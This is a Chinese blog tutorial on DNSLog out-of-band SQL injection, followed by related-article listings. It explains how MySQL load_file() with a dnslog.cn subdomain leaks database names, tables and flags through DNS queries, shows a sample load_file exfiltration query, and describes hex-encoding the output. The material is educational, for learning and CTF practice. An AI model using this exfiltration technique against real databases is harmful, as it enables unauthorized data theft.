深度剖析DNSLog注入原理&本地实例测试

最新推荐文章于 2023-03-31 11:08:48 发布
最新推荐文章于 2023-03-31 11:08:48 发布
阅读量7k 收藏 81
点赞数 19
分类专栏: 网安教程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/monster663/article/details/113757235
版权

声明:本文仅做学习交流探讨之用,切勿用于违法用途,请遵循《中华人民共和国网络安全法》,共同维护清朗的网络空间

Dns_log注入简介

我们将利用DNS解析的过程将留下痕迹和mysql中load_file()函数的能够访问互联网中的文件这一特点,将一些渗透的过程中将我们需要测试网站的结果回显到一个特定的可以记录DNS日志网站中,关于DNS的原理请参考https://blog.csdn.net/king9666/article/details/106022050

应用场景

DNS_log注入常用于网站对于我们的一些不合法的请求操作没有回显或者过滤了敏感的回显内容,

我们测试一个网站时的场景和一般的搭讪场景类似,对于一些防护能力落的服务器,“你的名字是什么?”,有的服务器会直接告诉你,“我叫xxx”,这就是无过滤/弱过滤的注入,对于一些只回答或者否的服务器,我们就会问,“你名字的第一个字是不是a?”、“你名字的第一个字是不是b?”......“你名字的第二个字是不是a?”.......,这就有点像盲注,而当我们遇到一些“不说话”的服务器,我们就可以尝试其他的注入方式,例如DNS_log注入

铺垫知识

一、http://dnslog.cn/ 这个网站可以记录下我们的DNS请求

打开网站的时候我们看到

这个时候我们需要通过第一个按钮,Get SubDomain得到一个域名,例如,我这里得到的是 p8f4es.dnslog.cn

此时我们可以尝试去ping一下这个url,可以看到能够ping通,也说明我们的DNS被成功解析

得到回复之后我们回到网页中,点击这个Refresh Record,可以看到部分的DNS解析记录

我们不难想到 p8f4es.dnslog.cn 域名下的任何子域名都会被记录下来,于是我们再 ping 一下 aaa.p8f4es.dnslog.cn

发现这条DNS请求也成功被记录了下来

二、mysql中load_file()函数

我们首先打开mysql

并且我们在D盘的根目录下准备了a.txt文件

然后我们利用load_file函数读取a.txt文件的内容

需要注意的是windows中的文件资源管理器中的文件目录用的是反斜杠 \ ,而我们的网站中文件的目录索引用的是斜杠 / ,我们这里load_file函数必须用斜杠 / 索引文件

三、concat()函数

很简单,用于拼接多个字符串

本地测试

结合铺垫知识中的亮点内容,我们也不难想到,服务器其实就是一台电脑,我们访问互联网上的资源实质也就是访问互联网中叫做服务器的这台电脑中的文件,利用这个特性,我们是否能够将mysql数据库中的一些信息回显到DNS请求中,于是我们重新获取一个域名,并通过ping测试该域名是否有效

然后我们在mysql中利用load_file函数输入这样一条指令,这里需要注意的是

根据load_file函数的语法规则,访问互联网中的文件时,我们需要在最前面加上两个斜杠  //

并且由于我们时需要到 nlur9s.dnslog.cn 这个域名对应的服务器中打开一个文件,所以我们在最后需要加上一个文件名,我这里用1.txt,大家可以随意,反正实际上也没有这个文件,但是只有加上文件名load_file函数才会帮我们去请求访问这个文件的内容,从而留下DNS记录

select load_file('//qwe.nlur9s.dnslog.cn/1.txt');

然后看到

我们继续本地测试,尝试爆出mysql中数据库的库名,我们首先用use语句选择数据库,然后利用concat语句拼接子句,再利用load_file语句把结果回显到DNS_log平台中

然后我们爆破该数据库中的所有表名,但是我们需要更改group_concat函数中的默认逗号分隔符,这里可以利用 . (点号) 也可以用 _ (下划线),建议的话用点好比较好,防止数据库库名中本身存在下划线

之后我们就可以常规的爆字段名,爆数据

上述方法的局限性及其消除

经过本地测试以及靶场测试发现,如果只使用上述的方法仍具有较大的局限性,原因是url中传递的字符非常有限,很多特殊字符如 { , } , !,是无法传递的,这就会导致我们的load_file函数失效,而在flag中括号什么的会经常出现,所以我们再次改进此方法

利用hex编码的改进

通过对select语句的结果进行hex编码,我们得到编码结果,

然后利用一个16进制解码网站即可解得flag

这样我们就绕过了特殊字符不能再url中传递的限制

tips:上述执行语句特意~~~没有留给大家,需要真正掌握的话还是需要自己敲一遍哦

以上就是DNS_log注入的解析以及实例测试,若还有什么疑惑,欢迎留言评论或私信

参考资料

https://blog.csdn.net/king9666/article/details/106022050

感谢上述博主的优秀博文

 

iOS之深度剖析UIScrollView的实现原理与阻尼动画
╰つ栺尖篴夢ゞ
10-06 5万+
一、前言 UIScrollView 是 iOS 开发中不可或缺也是使用最多的基础组件,常用的 Feed 流、Pager、轮播图等等,都与其存在密不可分的联系。日常开发中,我们通常局限于必要的几个调用接口和代理,而不曾探究隐藏在几个简单接口背后的故事,比如: 滚动视图如何在有限的区域内展示无限的内容? 每一次在滚动区域触控屏幕会产生哪些反应? 它在现实世界中又是怎样的物理形态? 本文从基本的参数观测开始,以数学、物理学和优化方法中的一些基本方法和概念为工具,探索 UIScrollVi
Java volatile关键字最全总结:原理剖析实例讲解(简单易懂)
热门推荐
夏日清风
06-13 22万+
本文从Java的内存模型和线程的工作原理出发,对volatile关键字进行介绍。帮助读者深入理解volatile的工作机制。同时,还通过简单易懂的示例讲解了如何正确地使用volatile关键字实现线程安全,避免常见的多线程安全问题。
DNSlog注入原理
sjp_1996的博客
04-20 3316
DNSlog注入原理及实验 遵守我国网络安全法,仅用于渗透测试交流学习。 DNS解析过程 用户输入域名,浏览器知道是域名,然后通过DNS解析为IP地址,最后浏览器通过IP地址访问服务器。IP地址与域名是应是一对多映射的关系。 DNSlog的产生 DNS在解析的过程中产生日志文件,这些日志文件记录了访问时间、域名、IP地址等信息内容。 实验 1、公共DNS免费平台:www.DNSlog.con,点击GetSubDomain,会随机生成一个域名。 此时打开CMD,用ping命令,ping通这个域名。因为我的
DNSLog使用笔记
糖小喵
09-27 5340
首先DNSlog网址:http://www.dnslog.cn/ 一般用作回显,这里会记录请求,也就是记录DNS访问记录的东西,同样在局域网可用http服务。
【渗透测试DNSLog注入
ssrf
10-25 3964
目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、p
DNSlog无回显注入及其原理
sweelg的博客
07-18 591
原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时,DNS的解析过程示意图。 其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。 具体使用详情参考: https://blog.csdn.net/qq_35569814/article/details/100348097 https://www.cnblogs.com/a.
DNSlog外带原理注入分析
Sentiment的博客
04-27 1万+
前言 最近一直听到DNSlog外带原理等词但对其原理一直只是自己的理解(回显DNS请求后的日志)并没有真正的了解过,所以这里做一下记录。 DNSlog原理 DNS DNS(Domain Name System)就是域名系统,负责把域名转换成IP地址;例如向浏览器访问a.com,浏览器就会将其解析成真实的IP访问对应服务器上的服务。 DNSlog DNSlog就是DNS的日志,DNS在域名解析的时候会留下域名和解析IP的记录 DNSlog外带原理 DNS在解析的时候会留下日志,我们将信息放在高级域名中,传递到
dnslog盲注原理
qq_50854662的博客
01-21 272
Dnslog盲注原理 布尔盲注和时间盲注相当于猜单词的游戏,我们需要对每一位逐步的猜测,效率很低,需要发送很多的请求进行判断,很可能会触发安全设备的防护 我们需要一种方式能够减少请求,直接回显数据——Dnslog注入 Dns在解析的时候会留下日志,通过读取多级域名的解析日志,获取请求信息 Dnslog盲注方法 登录http://ceye.io/网站并注册,得到属于自己的identifier 先尝试在终端运行curl dnslog.4ke30o.ceye.io Mysql load_file()函
WEB安全深度剖析.pdf
07-05
《Web安全深度剖析》从攻到防,从原理到实战,由浅入深、循序渐进地介绍了Web 安全体系。全书分4 篇共16 章,除介绍Web 安全的基础知识外,还介绍了Web 应用程序中最常见的安全漏洞、开源程序的攻击流程与防御,并...
天线开路短路检测原理_深度剖析开短路测试原理
weixin_28273593的博客
12-30 2984
开短路测试应用非常的广泛,只要特别的指出相关行业,所谓的开短路测试,都是指测试邦定线的开短路测试,IC的开短路测试。开短路测试,是测试工程师需要掌握的最基本的技能,通常被称为conTInuitytest或者open/shorttest。开短路测试原理,其实是基于产品本身管脚的ESD防静电保护二极管的正向导通压降的原理进行测试。通常可以或者需要进行开短路测试的器件管脚,对地或者对电源端,或者对地...
Web安全深度剖析.pdf
05-16
《Web安全深度剖析》从攻到防,从原理到实战,由浅入深、循序渐进地介绍了Web 安全体系。全书分4 篇共16 章,除介绍Web 安全的基础知识外,还介绍了Web 应用程序中最常见的安全漏洞、开源程序的攻击流程与防御,并...
Web安全和渗透测试有什么关系?
最新发布
Python_0011的博客
03-31 1278
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
DNSLog注入
一期一会的博客
01-13 4379
DNSLog注入原理 在sql注入时为布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截,又或者是目标站点没有回显,我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功,这时候就要用到我们的DNSlog注入。 首先需要有一个可以配置的域名,比如:xxx.io,然后通过代理商设置域名 xxx.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样以来所有 xxx.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请
mysql数据库中的骚姿势-dnslog注入原理
m0_46304840的博客
05-27 2420
前言 我以为我写过dns注入了,结果我心血来潮看看博客,发现我居然还没有写 那么我就写一下 0x01.Dns注入原理 什么是dns? 例子:我们去访问 www.baidu.com,这时候dns会吧 www.baidu.com 这个域名转换为 IP地址 Dns其实就是负责把域名转换为IP地址 如果还不懂的话点击 点击这里查看 Dns在域名解析时会留下域名和解析ip的记录,利用这点我们可以使用Dnslog(日志)记录显示我们的 注入结果 dnslog注入原理 通过子查询,将内容拼接到域名内,让load_f
DNSLog原理及代码实现
0of_blog
08-04 4878
自实现DNSLog服务器的意义及作用: 一些公共DNSLog服务可能已进入防火墙黑名单。不依赖他人服务器,增加可靠性。 结合自己的漏洞扫描工具,更定制化修改和部署DNSLog API。达到更高的效率。 附加实现DNS重绑定攻击等其他功能 熟悉DNSLog底层技术原理......
DNSlog注入学习
mingyqf的博客
06-03 1927
原文链接:https://www.cnblogs.com/Xy–1/p/12896599.html 作者: Lushun之前一直有看到过DNSlog这个字眼,但一直没有好好去了解一下,最近又接触到了刚好来深入学习下 我们都知道DNS就是将域名解析为ip,用户在浏览器上输入一个域名A.com,就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1,这样就可以访问127.0.0.1服务器上的相应服务。 那么DNSlog是什么。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名www.
学习DNSlog注入
qq_41631806的博客
04-09 306
##学习 DNSlog注入 简介 在sql注入无回显的情况下,盲注是一种办法,但费时。dnslog注入可以将数据外带,通过dns解析日志读取回显数据。 原理及利用场景详见大佬们的博客 t1ddl3r–《使用DNSLOG拯救你的盲打盲注 》 afanti–《 巧用DNSlog实现无回显注入》 Armyzer0–《利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果》...
SQL注入DNS_log注入
weixin_47785246的博客
07-11 904
SQL注入DNS_log注入 这篇文章将系统的讲解,SQL注入中的DNS_log注入原理、方法、以及靶场练习writeup。 文章目录SQL注入DNS_log注入前言一、DNS_log注入原理二、靶场实战1.DNSlog 平台2.封神台靶场总结 前言 关于SQL注入的详细内容请看我之前写的文章 提示:以下是本篇文章正文内容,下面案例可供参考 一、DNS_log注入原理 我们都知道,DNS解析是一种用户访问域名时,客户端向DNS发起DNS查询的到目标服务器ip地址,进而实现通信的机制,而
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

monster663

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值